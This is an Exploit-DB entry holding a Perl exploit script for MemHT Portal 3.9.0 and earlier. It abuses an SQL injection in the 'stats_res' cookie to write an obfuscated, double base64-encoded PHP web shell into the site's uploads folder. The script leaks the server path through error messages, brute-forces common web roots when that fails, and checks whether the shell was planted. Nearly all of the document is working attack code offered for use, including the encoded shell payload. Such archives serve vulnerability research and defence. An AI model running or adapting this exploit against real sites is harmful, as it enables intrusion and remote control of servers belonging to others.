MemHT Portal 3.9.0 - Remote Create Shell

EDB-ID:

6393


Author:

Ams

Type:

webapps


Platform:

PHP

Date:

2008-09-06


#!/usr/bin/perl
#
# MemHT Portal <= 3.9.0 Perl exploit
#
# discovered & written by Ams
# ax330d [doggy] gmail [dot] com
#
# DESCRIPTION:
#	Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's,
#	($_COOKIE['stats_res']) which later goes to MySQL request. So we are able to make
#	sql injection.
#	This exploit tries to create shell in /uploads/media/defined.php.
#
# NEEDED:
#	magic_quotes_gpc = off
#	MySQL should be able to write to file
#	Know full server path to portal

use strict;
use warnings;
use IO::Socket;

print "
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	MemHT portal <= 3.9.0 Perl exploit
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	";

@ARGV or &usage ;
my $expl_url = shift;
$expl_url =~ m#http://# or &usage;
my $serv_path = shift || '-b';
my $def_shell = '/uploads/media/defined.php';

my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q'
.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ'
.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4'
.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk'
.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX'
.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth'
.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53'
.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO'
.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp'
.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV'
.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu'
.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow'
.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT'
.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ'
.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU'
.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa'
.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH'
.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa'
.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr'
.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN'
.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt'
.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP'
.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3'
.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0'
.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y'
.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ'
.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2'
.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds'
.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT'
.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ'
.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4'
.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ'
.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT'
.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa'
.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw'
.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK'
.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH'
.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27'
.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B';

#	You can add more :P
my @paths = qw(
	/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts
	/home/www  home/httpd/vhosts
	/usr/local/apache/htdocs
	/www/htdocs
);

if($serv_path ne '-b') {
	@paths = ($serv_path);
}

exploit($expl_url);

sub exploit {
	
	#	Defining vars.
	my $url = pop @_;
	
	print "\n\tExploiting $url\n";
	
	my($host, $path, $packet, $rcvd);
    $url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e;
	
	#	Trying to get /cron.php to get server path
	$packet = "POST $path/cron.php HTTP/1.1\r\n";
	$packet .= "Host: $host\r\n";
	$packet .= "Connection: Close\r\n";
	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
	$rcvd = send_pckt($host, $packet, 1);
	
	if( ! $rcvd) {
		print "\n\tUnable to connect to http://$host\n\n";
		exit;
	}
	if ($rcvd =~ /Undefined variable:/) {
		$rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/;
		@paths = ($1);
		print "\n\tFound path!\n";
	} else {
		print "\n\tStarting bruteforce...\n";
	}
	
	#	Some bruteforce here if path is not defined
	foreach $serv_path (@paths) {
		
		print ("\n\tTesting $serv_path$path$def_shell ...\n");
		#	Sending poisoned request
		$packet = "POST $path/index.php HTTP/1.1\r\n";
		$packet .= "Host: $host\r\n";
		$packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n";
		$packet .= "Connection: Close\r\n";
		$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
		
		if( ! send_pckt($host, $packet)) {
			print "\n\tUnable to connect to http://$host\n\n";
			exit;
		}
	}

	#	Checking for shell presence
	$packet = "POST $path$def_shell HTTP/1.1\r\n";
	$packet .= "Host: $host\r\n";
	$packet .= "Connection: Close\r\n";
	$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
	
	sleep(1);
	$rcvd = send_pckt($host, $packet, 1);
	if( ! $rcvd) {
		print "\n\tUnable to connect to http://$host\n\n";
		exit;
	}

	if ($rcvd =~ /tmp\s+shell/) {
		print "\n\tExploited!\n\n";
	} else {
		print "\n\tExploiting failed.\n\n";
	}
	
}

sub send_pckt() {
		
	my $dat = 1;
	my ($host, $packet, $ret) = @_;
	my $socket = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerAddr=>$host,
		PeerPort=>"80"
	);
	if( ! $socket) {
		return 0;
	} else {
		
		print $socket $packet;
		if($ret) {
			my $rcv;
			while($rcv = <$socket>) {
			$dat .= $rcv;
			}
		}
		close $socket;
		return $dat;
	}
}

sub usage {
	print "\n\tUsage:\texpl.pl host [-b|full server path]

	(by default exlpoit checks /cron.php file errors to get real path,
	otherwise it will brute if failed, if used -b or none path is mentioned)

	Example:\t$0 http://localhost/ /var/www/htdocs
			$0 http://localhost/ -b
			$0 http://localhost/\n\n";
	exit;
}

# milw0rm.com [2008-09-06]